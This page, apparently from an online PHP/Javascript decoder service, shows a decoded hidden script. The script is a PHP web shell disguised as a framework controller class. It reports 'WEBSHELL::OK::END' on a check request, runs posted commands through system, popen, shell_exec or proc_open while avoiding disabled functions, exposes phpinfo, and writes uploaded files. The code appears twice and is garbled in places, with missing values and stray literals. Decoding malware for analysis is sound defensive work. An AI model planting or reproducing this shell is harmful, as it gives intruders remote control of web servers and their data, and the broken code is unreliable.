Online PHP and Javascript Decoder decode hidden script to uncover its real functionality


Show other level

class ControllerCommonGgshell extends Controller {
    public function index() {
        if (isset($_GET["check"])) {
            echo "WEBSHELL::OK::END";
        } elseif (isset($_GET["shell"])&&isset($_POST["cmd"])) {
            $c=;
            $d=array_map("trim",explode(",",ini_get("disable_functions")));

            $f=system;
            if(!in_array($f,$d)){$f($c);exit;}

            $f=popen;
            if(!in_array($f,$d)){
                $h=$f($c,"r");
                if($h===false){die("");}
                while(!feof($h)){$l=fgets($h);echo $l;}pclose($h);
                exit;
            }

            $f=shell_exec;
            if(!in_array($f,$d)){echo $f($c);exit;}

            $f=proc_open;
            if(!in_array($f,$d)){
                $i=[0=>["pipe","r"],1=>["pipe","w"],2=>["pipe","w"]];$p=[];
                $pr=$f($c,$i,$p);
                if(is_resource($pr)){
                    fclose($p[0]);
                    $o=stream_get_contents($p[1]);
                    $e=stream_get_contents($p[2]);
                    fclose($p[1]);fclose($p[2]);proc_close($pr);
                    echo $o;if($e)echo "err: ".$e;
                }
                exit;
            }
            echo "disable:\n";var_dump($d);
        } elseif(isset($_GET["info"])) {
            phpinfo();
        } elseif(isset($_GET["upload"])&&isset($_GET["n"])&&isset($_POST["content"])) {
            file_put_contents($_GET["n"],);
        } else {
            http_response_code(404);
        }
    }

class ControllerCommonGgshell extends Controller {
    public function index() {
        if (isset($_GET["check"])) {
            echo "WEBSHELL::OK::END";
        } elseif (isset($_GET["shell"])&&isset($_POST["cmd"])) {
            $c=;
            $d=array_map("trim",explode(",",ini_get("disable_functions")));

            $f=system;
            if(!in_array($f,$d)){$f($c);exit;}

            $f=popen;
            if(!in_array($f,$d)){
                $h=$f($c,"r");
                if($h===false){die("");}
                while(!feof($h)){$l=fgets($h);echo $l;}pclose($h);
                exit;
            }

            $f=shell_exec;
            if(!in_array($f,$d)){echo $f($c);exit;}

            $f=proc_open;
            if(!in_array($f,$d)){
                $i=[0=>["pipe","r"],1=>["pipe","w"],2=>["pipe","w"]];
                $pr=$f($c,$i,$p);
                if(is_resource($pr)){
                    fclose("[");
                    $o=stream_get_contents("]");
                    $e=stream_get_contents($p[2]);
                    fclose("]");fclose($p[2]);proc_close($pr);
                    echo $o;if($e)echo "err: ".$e;
                }
                exit;
            }
            echo "disable:\n";var_dump($d);
        } elseif(isset($_GET["info"])) {
            phpinfo();
        } elseif(isset($_GET["upload"])&&isset($_GET["n"])&&isset($_POST["content"])) {
            file_put_contents($_GET["n"],);
        } else {
            http_response_code(404);
        }
    }



© 2023 Quttera Ltd. All rights reserved.